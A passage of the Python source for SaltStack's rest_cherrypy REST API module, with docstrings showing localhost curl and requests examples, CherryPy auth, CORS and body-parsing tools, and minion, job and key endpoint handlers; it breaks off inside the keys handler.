Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
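For example, a rough sketch of the recommended JSON request made with the
:program:`requests` library, with an explicit :mailheader:`Accept` header (the
token below is a placeholder copied from an earlier ``/login`` call):
.. code-block:: python
    import requests
    # Placeholder token obtained from a prior POST to /login.
    token = "697adbdc8fe971d09ae4c2a3add7248859c87079"
    resp = requests.post(
        "https://localhost:8000",
        verify=False,  # only for self-signed test certificates
        headers={
            "X-Auth-Token": token,
            "Content-Type": "application/json",  # format of the request body
            "Accept": "application/x-yaml",      # desired response format
        },
        json=[{"client": "local", "tgt": "*", "fun": "test.ping"}],
    )
    print(resp.text)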
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule of thumb: if you wouldn't do it at the CLI, don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
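A minimal sketch of that asynchronous pattern, using the :program:`requests`
library and assuming eauth credentials like the earlier examples (the job-cache
lookup below is illustrative, not a prescribed workflow):
.. code-block:: python
    import requests
    session = requests.Session()
    # Authenticate once; the session cookie carries the token afterwards.
    session.post("https://localhost:8000/login", verify=False,
                 json={"username": "saltdev", "password": "saltdev", "eauth": "auto"})
    # Submit the job asynchronously; the response carries a job id, not results.
    resp = session.post("https://localhost:8000", verify=False,
                        json=[{"client": "local_async", "tgt": "*", "fun": "test.ping"}])
    jid = resp.json()["return"][0]["jid"]
    # Later, look up the cached job return by its id.
    result = session.get("https://localhost:8000/jobs/{}".format(jid), verify=False)
    print(result.json())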
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
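For example, a master configuration sketch that raises both values (the numbers
are illustrative starting points, not recommendations):
.. code-block:: yaml
    rest_cherrypy:
      port: 8000
      thread_pool: 300
      socket_queue_size: 100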
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
    logger.warning(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
    Verifies user requests against the API whitelist (user/IP pairs)
    in order to provide IP-based whitelisting for the API, similar to the
    master's ACL but enforced at the API layer.
    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy 12.0.0, but
# still check for TimeoutError and handle it when running CherryPy < 12.
# The check was moved down from the SaltClientTimeout except clause because
# adding it there as a one-line if raises a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
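# Illustrative note (assumed example, not upstream code): for a urlencoded POST
# such as "client=local&tgt=*&fun=test.kwarg&arg=one=1", hypermedia_in plus
# lowdata_fmt leave the request with:
#
#   cherrypy.request.unserialized_data == {"client": "local", "tgt": "*",
#                                          "fun": "test.kwarg", "arg": "one=1"}
#   cherrypy.request.lowstate == [{"client": "local", "tgt": "*",
#                                  "fun": "test.kwarg", "arg": ["one=1"]}]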
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
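# Illustrative note (not upstream code): a lowstate chunk such as
# {"tgt": "*", "fun": "test.ping", "arg": "x"} executed via
# exec_lowstate(client="local_async", token="d40d1e1e") is passed to
# self.api.run() as
# {"tgt": "*", "fun": "test.ping", "arg": ["x"],
#  "client": "local_async", "token": "d40d1e1e"}.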
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
